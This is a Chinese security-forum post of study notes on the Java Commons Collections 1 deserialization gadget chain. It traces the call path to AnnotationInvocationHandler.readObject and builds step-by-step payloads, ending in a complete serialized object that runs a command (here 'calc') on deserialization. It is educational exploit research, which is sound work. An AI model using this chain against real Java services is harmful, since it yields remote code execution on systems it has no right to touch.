安全矩阵

 找回密码
 立即注册
搜索
查看: 508|回复: 0

Java反序列化漏洞:Commons Collections 1 学习笔记

[复制链接]

252

主题

252

帖子

1307

积分

金牌会员

Rank: 6Rank: 6

积分
1307
发表于 2022-12-28 15:20:11 | 显示全部楼层 |阅读模式
原文链接:Java反序列化漏洞:Commons Collections 1 学习笔记


前置知识
分析Transformer接口及其实现类。

ConstantTransformer:构造函数传入一个对象,调用transform()方法时,不管输入是什么,都返回构造函数ConstantTransformer()传入的对象。

  1. // ConstantTransformer构造函数及transform()函数
  2. public ConstantTransformer(Object constantToReturn) {
  3.     super();
  4.     iConstant = constantToReturn;
  5. }

  6. public Object transform(Object input) {
  7.     return iConstant;
  8. }
复制代码



ChainedTransformer:自动对transformers数组中每一个元素transformers调用transform(),前一个的输出作为后一个的输入,链式调用transform()方法。

  1. // ChainedTransformer构造函数及transform()函数
  2. public ChainedTransformer(Transformer[] transformers) {
  3.     super();
  4.     iTransformers = transformers;
  5. }

  6. public Object transform(Object object) {
  7.     for (int i = 0; i < iTransformers.length; i++) {
  8.         object = iTransformers[i].transform(object);
  9.     }
  10.     return object;
  11. }
复制代码



InvokerTransformer:相当于重新实现了反射,构造函数传入方法名、参数类型、参数。transform()传入对象,进行反射调用。

  1. // InvokerTransformer构造函数及transform()函数
  2. public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
  3.     super();
  4.     iMethodName = methodName;
  5.     iParamTypes = paramTypes;
  6.     iArgs = args;
  7. }

  8. // InvokerTransformer的transform()方法
  9. public Object transform(Object input) {
  10.     if (input == null) {
  11.         return null;
  12.     }
  13.     try {
  14.         Class cls = input.getClass();
  15.         Method method = cls.getMethod(iMethodName, iParamTypes);
  16.         return method.invoke(input, iArgs);

  17.     } catch (NoSuchMethodException ex) {
  18.         throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' does not exist");
  19.     } catch (IllegalAccessException ex) {
  20.         throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
  21.     } catch (InvocationTargetException ex) {
  22.         throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' threw an exception", ex);
  23.     }
  24. }
复制代码


三种方式弹出计算器

  1. // 正常弹计算器
  2. Runtime.getRuntime().exec("calc");

  3. // 反射调用计算器
  4. // 获取一个Runtime的对象
  5. Runtime r = Runtime.getRuntime();
  6. // 获取Runtime类
  7. Class c = Runtime.class;
  8. // 获取Runtime类的exec()方法,(方法名,参数类型)
  9. Method execMethod = c.getMethod("exec", String.class);
  10. // 反射调用exec弹计算器,(对象,参数)
  11. execMethod.invoke(r,"calc");


  12. /*InvokerTransformer调用计算器
  13. 相当于重新实现了反射,把上面的反射调用后两行写成一行
  14. */
  15. Runtime r = Runtime.getRuntime();
  16. InvokerTransformer invokerTransformer = new InvokerTransformer("exec",
  17.         new Class[]{String.class}, new Object[]{"calc"}).transform(r);
复制代码




构造调用链调用链构造原则:找调用关系要找不同名的方法,如果找到同名,再通过find usages得到的还是一样的结果。最终还是得找不同的方法才能跳转。哪里调用了transform():checkSetValue()-->transform()
发现了InvokerTransformer类中的transform()方法是危险方法,从后往前找,找哪个类的不同方法里面调用了transform()。

找到InvokerTransformer类中的transform(),右键,点 Find Usages,找函数调用关系,最好找不同名的方法,调用了transform()。因为transform()调用transform()不能换到别的方法里,没有意义。

最后的目标是回到readObject()里,比如LazyMap类中的get()方法调用了transform(),再接着去找谁又调用了get()。如果有一个类的readObject()调用了get(),那我们就可能找到了调用链。

最终选择TransformedMap这个类,因为TransformedMap类中有好几处都调用了transform()。

找到TransformedMap类中checkSetValue()中调用了valueTransformer.transform(value);
  1. <code>protected Object checkSetValue(Object value) {</code><code>   
  2.     return valueTransformer.transform(value);
  3. </code><code>}</code>
复制代码



看一下valueTransformer是什么,在TransformedMap的构造函数中可以对valueTransformer赋值。

构造函数的参数:传入一个Map和两个Transformer。

  1. protected TransformedMap(Map map, Transformer keyTransformer, Transformer valueTransformer) {
  2.     super(map);
  3.     this.keyTransformer = keyTransformer;
  4.     this.valueTransformer = valueTransformer;
  5. }
复制代码



TransformedMap的构造函数属性是protected,只能在类内调用。
因此找一下哪里调用TransformedMap()构造函数。
找到decorate()调用了 TransformedMap()。
调用decorate()相当于调用了构造函数。

  1. public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) {
  2.     return new TransformedMap(map, keyTransformer, valueTransformer);
  3. }
复制代码



构造checkSetValue()中的valueTransformer,因为要通过InvokerTransformer反射调用计算器,所以要让valueTransformer = invokerTransformer,invokerTransformer为InvokerTransformer类的一个对象。

在构造函数中可以进行valueTransformer的赋值,但是TransformedMap的构造函数不能直接调用(属性为protected),间接通过decorate()来给valueTransformer赋值。

现在valueTransformer = invokerTransformer

  1. // 实例化一个InvokerTransformer (invokerTransformer)
  2. InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});
  3. // 新建一个map ,传入decorate()中
  4. HashMap<Object, Object> map = new HashMap<>();
  5. Map<Object, Object> transforedMap = TransformedMap.decorate(map, null, invokerTransformer);
复制代码


哪里调用了checkSetValue():setValue()-->checkSetValue()
在AbstractInputCheckedMapDecorator类中的setValue()中调用了checkSetValue()。
AbstractInputCheckedMapDecorator类是TransformedMap的父类。
AbstractInputCheckedMapDecorator类的setValue()重写了Map.Entry类中的setValue()。

直接调用setValue(),可以弹出计算器。

  1. // 实例化一个InvokerTransformer (invokerTransformer)
  2. InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});
  3. // 新建一个map ,传入decorate()中
  4. HashMap<Object, Object> map = new HashMap<>();
  5. Map<Object, Object> transforedMap = TransformedMap.decorate(map, null, invokerTransformer);
  6. for(Map.Entry entry : transforedMap.entrySet()){
  7.     entry.setValue(r);
  8. }
复制代码


哪里调用了setValue():readObject()-->setValue()
AnnotationInvocationHandler类中的readObject()方法中调用了setValue()。

AnnotationInvocationHandler类中的readObject()方法:

  1. private void readObject(java.io.ObjectInputStream s)
  2.     throws java.io.IOException, ClassNotFoundException {
  3.     s.defaultReadObject();

  4.     // Check to make sure that types have not evolved incompatibly

  5.     AnnotationType annotationType = null;
  6.     try {
  7.         annotationType = AnnotationType.getInstance(type);
  8.     } catch(IllegalArgumentException e) {
  9.         // Class is no longer an annotation type; time to punch out
  10.         throw new java.io.InvalidObjectException("Non-annotation type in annotation serial stream");
  11.     }

  12.     Map<String, Class<?>> memberTypes = annotationType.memberTypes();

  13.     // If there are annotation members without values, that
  14.     // situation is handled by the invoke method.
  15.     for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) {
  16.         String name = memberValue.getKey();
  17.         Class<?> memberType = memberTypes.get(name);
  18.         if (memberType != null) {  // i.e. member still exists
  19.             Object value = memberValue.getValue();
  20.             if (!(memberType.isInstance(value) ||
  21.                   value instanceof ExceptionProxy)) {
  22.                 memberValue.setValue(
  23.                     new AnnotationTypeMismatchExceptionProxy(
  24.                         value.getClass() + "[" + value + "]").setMember(
  25.                             annotationType.members().get(name)));
  26.             }
  27.         }
  28.     }
  29. }
  30. AnnotationInvocationHandler(Class<? extends Annotation> type, Map<String, Object> memberValues) {
  31.     Class<?>[] superInterfaces = type.getInterfaces();
  32.     if (!type.isAnnotation() ||
  33.         superInterfaces.length != 1 ||
  34.         superInterfaces[0] != java.lang.annotation.Annotation.class)
  35.         throw new AnnotationFormatError("Attempt to create proxy for a non-annotation type.");
  36.     this.type = type;
  37.     this.memberValues = memberValues;
  38. }
复制代码



看AnnotationInvocationHandler类的构造函数,发现构造函数的参数中可以传入Map,那这个Map就是我们完全可以控制的,因为在构造函数里面。

所以我们就可以把我们构造好的TransformedMap放进去,需要注意类属性不是public,为default类型,只有在sun.reflect.annotation包底下才能访问到,因此必须通过反射去获取,不能直接获取。

同时构造函数也是default类型,需要用getDeclaredConstructor()来获取构造函数。

  1. // 获取类
  2. Class<?> c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
  3. // 获取构造函数
  4. Constructor<?> annotationInvocationHandlerConstructor = c.getDeclaredConstructor(Class.class, Map.class);
  5. // 爆破
  6. annotationInvocationHandlerConstructor.setAccessible(true);
  7. // 获取实例,随便写一个常用的注解(Override)
  8. Object o = annotationInvocationHandlerConstructor.newInstance(Override.class, transforedMap);

  9. serialize(o); // 序列化
  10. deserialize("ser.bin"); // 反序列化
复制代码


payload1

  1. // 此处的Runtime 对象 r 是不能序列化的
  2. Runtime r = Runtime.getRuntime();
  3. InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});
  4. HashMap<Object, Object> map = new HashMap<>();
  5. map.put("key","value");
  6. Map<Object, Object> transforedMap = TransformedMap.decorate(map, null, invokerTransformer);
  7. /*
  8. for(Map.Entry entry : transforedMap.entrySet()){
  9.      entry.setValue(r);
  10. }
  11. */
  12. // 获取类
  13. Class<?> c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
  14. // 获取构造函数
  15. Constructor<?> annotationInvocationHandlerConstructor = c.getDeclaredConstructor(Class.class, Map.class);
  16. // 爆破
  17. annotationInvocationHandlerConstructor.setAccessible(true);
  18. // 获取实例
  19. Object o = annotationInvocationHandlerConstructor.newInstance(Override.class, transforedMap);

  20. serialize(o); // 序列化
  21. deserialize("ser.bin"); // 反序列化
复制代码



从已注释的for循环可以看到,我们调用setValue(r)需要传入r
目前payload的几个问题:
问题1、setValue()中我们需要传入Runtime的对象r,而AnnotationInvocationHandler类中的setValue()中的参数还无法控制。问题2、Runtime类没有继承Serializable接口,不能序列化/反序列化。问题2解决:
Runtime类不能序列化,而Class类可以序列化
Runtime r = Runtime.getRuntime();不能序列化
Class c = Runtime.class;可以序列化

正常的反射调用

  1. //        正常的反射调用
  2. //        获取Runtime的class对象
  3.         Class c = Runtime.class;
  4. //        获取getRuntime方法  (函数名,参数类型)无参方法,参数类型写null
  5.         Method getRuntimeMethod = c.getMethod("getRuntime", null);
  6. //        获取到Runtime的对象r
  7. //        第一个参数表示在那个对象调用,getRuntime()为static方法,所以为null
  8. //        第二个参数表示方法的参数,没有参数,所以为null
  9.         Runtime r = (Runtime) getRuntimeMethod.invoke(null, null);
  10. //        获取exec方法
  11.         Method execMethod = c.getMethod("exec", String.class);
  12. //        调用exec,(对象,参数)
  13.         execMethod.invoke(r, "calc");
复制代码



改成InvokerTransformer(方法名, 参数类型, 参数)

  1. /*       改写成InvokerTransformer(方法名, 参数类型, 参数),链式调用
  2. //        相当于
  3. //        Class c = Runtime.class;
  4. //        Method getRuntimeMethod = c.getMethod("getRuntime", null);

  5. 获取getRuntime方法,相当于在Runtime.class上调用getMethod()方法,参数为getRuntime,
  6. 参数类型为null
  7. */
  8.         Method getRuntimeMethod1 = (Method) new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
  9.                 new Object[]{"getRuntime", null}).transform(Runtime.class);
  10. //        获取Runtime对象
  11.         Runtime r1 = (Runtime) new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
  12.                 new Object[]{null, null}).transform(getRuntimeMethod1);
  13.         new InvokerTransformer("exec", new Class[]{String.class},
  14.                 new Object[]{"calc"}).transform(r1);
复制代码



改成ChainedTransformer的形式

  1. //改成ChainedTransformer的形式
  2. // 构造transformers 数组
  3. Transformer[] transformers = new Transformer[]{
  4.         new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
  5.                 new Object[]{"getRuntime", null}),
  6.         new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
  7.                 new Object[]{null, null}),
  8.         new InvokerTransformer("exec", new Class[]{String.class},
  9.                 new Object[]{"calc"})
  10. };
  11. ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  12. chainedTransformer.transform(Runtime.class); // 调试的时候要注释掉
复制代码



上面的payload中,只有Runtime.class是我们可以控制的。
payload2,解决了问题2,还不能执行成功。
  1. // 此处的Runtime 对象 r 是不能序列化的,需要修改
  2. // Runtime r = Runtime.getRuntime();
  3. // InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});
  4. Transformer[] transformers = new Transformer[]{
  5.         new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
  6.                 new Object[]{"getRuntime", null}),
  7.         new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
  8.                 new Object[]{null, null}),
  9.         new InvokerTransformer("exec", new Class[]{String.class},
  10.                 new Object[]{"calc"})
  11. };
  12. ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

  13. HashMap<Object, Object> map = new HashMap<>();
  14. map.put("key","value");
  15. Map<Object, Object> transforedMap = TransformedMap.decorate(map, null, chainedTransformer);
  16. /*
  17. for(Map.Entry entry : transforedMap.entrySet()){
  18.      entry.setValue(r);
  19. }
  20. */
  21. // 获取类
  22. Class<?> c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
  23. // 获取构造函数
  24. Constructor<?> annotationInvocationHandlerConstructor = c.getDeclaredConstructor(Class.class, Map.class);
  25. // 爆破
  26. annotationInvocationHandlerConstructor.setAccessible(true);
  27. // 获取实例
  28. Object o = annotationInvocationHandlerConstructor.newInstance(Override.class, transforedMap);

  29. serialize(o); // 序列化
  30. deserialize("ser.bin"); // 反序列化
复制代码


问题3、AnnotationInvocationHandler类中的readObject()中的for循环中有两个if判断需要满足。问题3解决
分析:
1、可能没进入if判断。
2、后面的setValue()括号中的new AnnotationTypeMismatchExceptionProxy()是我们不能控制的。
第一个if:
调试:下断点运行,发现Override.class中是空的,getKey()得到的是null,进不去第一个if判断。

  1. public @interface Override {
  2. }
  3. for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) {
  4.     String name = memberValue.getKey();
  5.     // 因为Override里面是空实现,所以memberType为null
  6.     Class<?> memberType = memberTypes.get(name);
  7.     if (memberType != null) {  // i.e. member still exists
  8.         Object value = memberValue.getValue();
  9.         if (!(memberType.isInstance(value) ||
  10.               value instanceof ExceptionProxy)) {
  11.             memberValue.setValue(
  12.                 new AnnotationTypeMismatchExceptionProxy(
  13.                     value.getClass() + "[" + value + "]").setMember(
  14.                         annotationType.members().get(name)));
  15.         }
  16.     }
  17. }
复制代码




  1. <code class="hljs">Object o = annotationInvocationHandlerConstructor.newInstance(Override.class, transforedMap);</code>
复制代码



改成
  1. <code class="hljs">Object o = annotationInvocationHandlerConstructor.newInstance(Target.class, transforedMap);</code>
复制代码



注解Target中是有参数的。

  1. public @interface Target {
  2.     /**
  3.      * Returns an array of the kinds of elements an annotation type
  4.      * can be applied to.
  5.      * @return an array of the kinds of elements an annotation type
  6.      * can be applied to
  7.      */
  8.     ElementType[] value();
  9. }
复制代码



第二个if(直接可以进入,不需要构造):
1、memberType能不能强转成value
2、value是不是ExceptionProxy类的实例
  1. <code class="hljs">if (!(memberType.isInstance(value) || value instanceof ExceptionProxy))</code>
复制代码



问题1解决:

使用ConstantTransformer()。
ConstantTransformer:不管输入是什么,调用transform()方法时,都返回构造函数输入的值。
payload3:
  1. // 此处的Runtime 对象 r 是不能序列化的,需要修改
  2. // Runtime r = Runtime.getRuntime();
  3. // InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});
  4. Transformer[] transformers = new Transformer[]{
  5.         new ConstantTransformer(Runtime.class),
  6.         new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
  7.                 new Object[]{"getRuntime", null}),
  8.         new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
  9.                 new Object[]{null, null}),
  10.         new InvokerTransformer("exec", new Class[]{String.class},
  11.                 new Object[]{"calc"})
  12. };
  13. ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

  14. HashMap<Object, Object> map = new HashMap<>();
  15. // 第一个值要与所选注解中的参数对应,Target中的参数为value,所以第一个参数要改为value
  16. map.put("value","value");
  17. Map<Object, Object> transforedMap = TransformedMap.decorate(map, null, chainedTransformer);
  18. /*
  19. for(Map.Entry entry : transforedMap.entrySet()){
  20.      entry.setValue(r);
  21. }
  22. */
  23. // 获取类
  24. Class<?> c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
  25. // 获取构造函数
  26. Constructor<?> annotationInvocationHandlerConstructor = c.getDeclaredConstructor(Class.class, Map.class);
  27. // 爆破
  28. annotationInvocationHandlerConstructor.setAccessible(true);
  29. // 获取实例
  30. Object o = annotationInvocationHandlerConstructor.newInstance(Target.class, transforedMap);

  31. serialize(o); // 序列化
  32. deserialize("ser.bin"); // 反序列化
复制代码


正向调用顺序:
编辑

参考文献:

Java 反序列化漏洞(二) - Commons Collections(https://su18.org/post/ysoserial-su18-2/

Java反序列化CommonsCollections篇(一) CC1链手写EXP(https://www.bilibili.com/video/BV1no4y1U7E1/?spm_id_from=333.880.my_history.page.click&vd_source=3b1d14eb2f4ad239e25f14b736dd9ee4

Java ysoserial学习之CommonsCollections1(二)https://mp.weixin.qq.com/s?__biz=MzkzODIwMTIwNg==&mid=2247484514&idx=1&sn=2552ec324c1395c9c3c8b9f78cbb4908&chksm=c2829d7bf5f5146d1d2dd0531344262a31b44f27d8c56c7465a9d0555c8773bc096424a0dd53&scene=178&cur_album_id=1898778471904952325#rd

Commons Collections Java反序列化漏洞深入分析(https://security.tencent.com/index.php/blog/msg/97



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-4-19 12:01 , Processed in 0.015949 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表